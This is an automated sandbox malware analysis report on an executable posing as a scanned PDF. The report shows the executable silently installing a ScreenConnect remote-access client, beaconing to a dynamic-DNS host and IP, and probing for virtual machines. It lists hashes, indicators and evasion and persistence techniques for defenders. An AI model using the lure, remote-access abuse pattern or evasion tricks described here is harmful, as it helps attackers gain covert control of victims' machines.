Windows Analysis Report
Scan_PDF_5255303072.exe

Overview

General Information

Sample name: Scan_PDF_5255303072.exe
Analysis ID: 1523874
MD5: 59a8c372735dafb6e20ad3cf30770d8e
SHA1: c9b28e26d40d9d42a7c19c123103f854501a0edb
SHA256: a337a28b1413ed787b4e313cfb04ffef6a4730cddc7543b18b6b8656e65111a0
Tags: exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score: 46
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 32
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Uses dynamic DNS services
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Scan_PDF_5255303072.exe ReversingLabs: Detection: 18%
Source: Scan_PDF_5255303072.exe Virustotal: Detection: 25% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 92.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_042FCC94 CryptProtectData, 8_2_042FCC94
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_042FD4D0 CryptProtectData, 8_2_042FD4D0
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C0007C CryptUnprotectData, 8_2_05C0007C
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C00D42 CryptUnprotectData, 8_2_05C00D42
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C00062 CryptUnprotectData, 8_2_05C00062
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe EXE: msiexec.exe Jump to behavior

Compliance
barindex
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe EXE: msiexec.exe Jump to behavior
Uses 32bit PE files
Source: Scan_PDF_5255303072.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Scan_PDF_5255303072.exe Static PE information: certificate valid
Source: Scan_PDF_5255303072.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486417098.0000000002412000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Scan_PDF_5255303072.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Scan_PDF_5255303072.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Scan_PDF_5255303072.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Scan_PDF_5255303072.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2621215881.0000000002641000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1503870497.000000001B062000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486251470.00000000023D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Scan_PDF_5255303072.exe
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1418668144.0000000000F3D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Scan_PDF_5255303072.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1392487484.00000000041A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Scan_PDF_5255303072.exe, 4a71ec.msi.3.dr, MSI74E9.tmp.3.dr, 4a71ee.msi.3.dr, MSI74FA.tmp.3.dr, 4a71ed.rbs.3.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Scan_PDF_5255303072.exe, 4a71ec.msi.3.dr, MSI6E42.tmp.2.dr, 4a71ee.msi.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: Scan_PDF_5255303072.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486417098.0000000002412000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Scan_PDF_5255303072.exe
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\System32\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: e: Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe File opened: c: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: a: Jump to behavior

Networking
barindex
Enables network access during safeboot for specific services
Source: C:\Windows\System32\msiexec.exe Registry value created: NULL Service Jump to behavior
Uses dynamic DNS services
Source: unknown DNS query: name: kkl22.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49710 -> 188.119.113.59:8041
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.119.113.59 188.119.113.59
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: kkl22.ddns.net
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://ocsp.digicert.com0
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000008.00000002.2623297821.0000000001E8E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390661165.00000000041A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390661165.00000000041A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390661165.00000000041A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr String found in binary or memory: http://wixtoolset.org/releases/
Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsCredentialProvider.dll.3.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.3.dr String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

Spam, unwanted Advertisements and Ransom Demands
barindex
Reads the Security eventlog
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Reads the System eventlog
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect Jump to behavior

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Scan_PDF_5255303072.exe
Contains functionality to launch a process as a different user
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C13D80 CreateProcessAsUserW, 8_2_05C13D80
Creates files inside the system directory
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4a71ec.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{98FA6172-4354-E89C-196A-00A1A1714F7D} Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI74E9.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI74FA.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7A98.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4a71ee.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4a71ee.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{98FA6172-4354-E89C-196A-00A1A1714F7D} Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{98FA6172-4354-E89C-196A-00A1A1714F7D}\DefaultIcon Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\Installer\wix{98FA6172-4354-E89C-196A-00A1A1714F7D}.SchedServiceConfig.rmi Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa) Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\gquftksg.tmp Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\gquftksg.newcfg Jump to behavior
Deletes files inside the Windows folder
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI74FA.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_05AEF0D0 0_2_05AEF0D0
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_05AE6F20 0_2_05AE6F20
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_05AE9F20 0_2_05AE9F20
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_05AE60E0 0_2_05AE60E0
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_05AE6F10 0_2_05AE6F10
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_05B0039B 0_2_05B0039B
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_01ADB550 8_2_01ADB550
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_01ADA820 8_2_01ADA820
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_01ADA830 8_2_01ADA830
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C00448 8_2_05C00448
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C11B40 8_2_05C11B40
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C11B40 8_2_05C11B40
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB10080DFD 9_2_00007FFB10080DFD
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB10086E20 9_2_00007FFB10086E20
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB10080EA3 9_2_00007FFB10080EA3
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB10081387 9_2_00007FFB10081387
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB10429CB8 9_2_00007FFB10429CB8
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB1042D6C5 9_2_00007FFB1042D6C5
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB104261C0 9_2_00007FFB104261C0
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB10422745 9_2_00007FFB10422745
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFB10070DFD 10_2_00007FFB10070DFD
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFB10070EA3 10_2_00007FFB10070EA3
